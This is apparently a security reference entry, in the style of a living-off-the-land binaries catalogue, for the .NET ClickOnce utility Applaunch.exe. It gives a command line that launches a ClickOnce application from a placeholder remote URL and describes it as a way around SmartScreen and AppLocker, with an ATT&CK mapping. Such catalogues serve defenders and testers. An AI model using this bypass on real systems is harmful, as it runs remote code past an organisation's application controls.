.. /Applaunch.exe
Star

AWL bypass (ClickOnce, Remote)

Microsoft .NET ClickOnce Launch Utility.

Paths:

Resources:

Acknowledgements:

Detections:

AWL bypass

  1. Launches a ClickOnce application via Applaunch.exe. Bypasses SmartScreen and default AppLocker rules when the application is published as partial trust.

    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Applaunch.exe" /activate "{REMOTEURL}#APPLICATION_METADATA_HERE"
    Use case

    Execute ClickOnce applications in environments where dfsvc.exe would normally enforce full-trust and SmartScreen checks. Can be abused as an AWL bypass in rare configurations.

    Privileges required
    User
    Operating systems
    Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1127.002
    Tags
    Execute: ClickOnce
    Execute: Remote